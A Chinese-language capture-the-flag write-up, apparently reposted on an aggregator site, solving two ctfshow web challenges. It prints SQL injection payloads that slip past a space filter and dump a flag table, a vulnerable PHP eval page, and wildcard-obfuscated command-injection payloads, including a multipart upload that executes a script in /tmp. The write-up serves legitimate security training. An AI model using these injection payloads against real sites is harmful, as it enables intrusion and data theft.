ctfshow web

web7

• 打開網站，點擊三個鏈接，在url下顯示id=1等字段
• 其實第一想法為爆破，看看id=n時是否有flag，結果沒有。掃描網站后臺也沒發現
• 試試sql注入，id=1 and 1=1# 有提示，回顯報錯，那就說明了考點并且存在過濾，一個個嘗試。當輸入空格時有明顯提示，就是為過濾空格
• 空格的繞過/**/或者()都可以繞過/*!1=1*/

#查數據庫名 -2'/**/union/**/select/**/1,database(),3# #查表 -2'/**/union/**/select/**/1,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),3# #查列 -2'/**/union/**/select/**/1,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name="flag"),3# #查數據 2'/**/union/**/select/**/1,(select/**/group_concat(flag)from/**/flag),3# #上面雙引號等的使用，自己多嘗試看看需要單引號還是雙引號，或者不需要

• sqlmap一把梭,加參數 tamper=space2comment 但是不同的level和risk檢測的注入方式不同，可能只檢測出盲注。

紅包題第二彈

• 打開，看到 where is flag
• 看源碼

<!-- hint:?cmd= -->

• 隨便輸入cmd值，get請求，得到源碼

<?php #error_reporting(0); ?> <html lang="zh-CN"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width minimum-scale=1.0 maximum-scale=1.0 initial-scale=1.0" /><title>ctf.show_紅包題</title> </head> <body><center><h2>ctf.show_紅包題</h2><h4>where is the flag?</h4></center><!-- hint:?cmd= --><?phpif(isset($_GET['cmd'])){$cmd=$_GET['cmd'];highlight_file(__FILE__);if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){die("cerror");}if(preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\（|\）|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)){die("serror");}eval($cmd);}?></body> </html>

• 此處參考編程獵人師傅博客
• 第一個正則字母沒有過濾p,第二個正則沒有過濾常見字符 ? / =
• 模糊匹配什么鬼？？？

#模糊匹配 ?cmd=?><?=`/???/?p /???????? p.ppp`;?> #相當于 ?cmd=?><?=`/bin/cp /flag.txt p.ppp`;?>人話: 相當于 ?>閉合前面php語句 <?= 可以替代 <? echo (php>5.4.0) 后面的模糊匹配相當于 /bin/cp /flag.txt p.ppp #此命令為將根目錄下的文件復制到此目錄下的p.ppp文件中(就是cp命令的具體路徑了) ? 作為通配符，太強了 反引號內的命令會先執行 然后訪問p.ppp文件就會下載，得到flag能根據一個p想到cp，老師傅們太強了

（但是訪問p.ppp會下載文件是為什么？？echo的原因，還是文本文件會被直接下載。）
深入了解一下，還有其他做法
參考內容：CTFSHOW WEB 紅包題第二彈

<?= xxx 相當于 <? echo(xxx) #php的短標簽 . 相當于source命令，可用于執行文件（Linux） + 在url中表示空格，因此使用加法時url編碼 %2B #臨時文件夾可通過php.ini的upload_tmp_dir 指定，默認是/tmp目錄。 不僅可以使用自己命名的p.ppp文件，還可以利用上傳文件時保存文件夾 /tmp目錄 #臨時文件命名規則 php+4或者6位隨機數字和大小寫字母，在windows下有tmp后綴，linux沒有 tmp/phpxxxx 因此模糊匹配 /??p/p?p????傳入內容 ?><?=.+/??p/p?p????還使用了POST請求發送數據，改變以下三個地方 POST /?cmd=?><?=`.+/??p/p?p??????`; HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------10242300956292313528205888-----------------------------10242300956292313528205888 Content-Disposition: form-data; name="fileUpload"; filename="1.txt" Content-Type: text/plain#! /bin/shcat /flag.txt -----------------------------10242300956292313528205888--

• content-type : multipart/from-data;表示上傳文件。
• boundary為邊界分界線，后面三串數字為開始和結束(末尾有–)數字，由瀏覽器生成隨機數字
• sh或bash等為自帶的shell語言，可執行命令。
• source命令為在當前bash環境下讀取并執行FileName中的命令·

#在自己的Linux下實驗 cd /tmp vi 1.txt => 輸入 ll #在/tmp目錄下創建1.txt文件并寫入 ll source 1.txt #相當于執行ll命令 . /tmp/1.txt #執行ll命令 echo `source 1.txt` #將結果打印出來

• 這就完美解釋了上傳（我認為的），上傳后就可以執行cat /flag命令，在echo打印出來，但是改變三處地方，真的是學到了。

以上內容僅供學習交流使用
部分文件是我CV打法拿過來的，如有侵權，聯系我刪除。

總結

以上是生活随笔為你收集整理的ctfshow练习的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。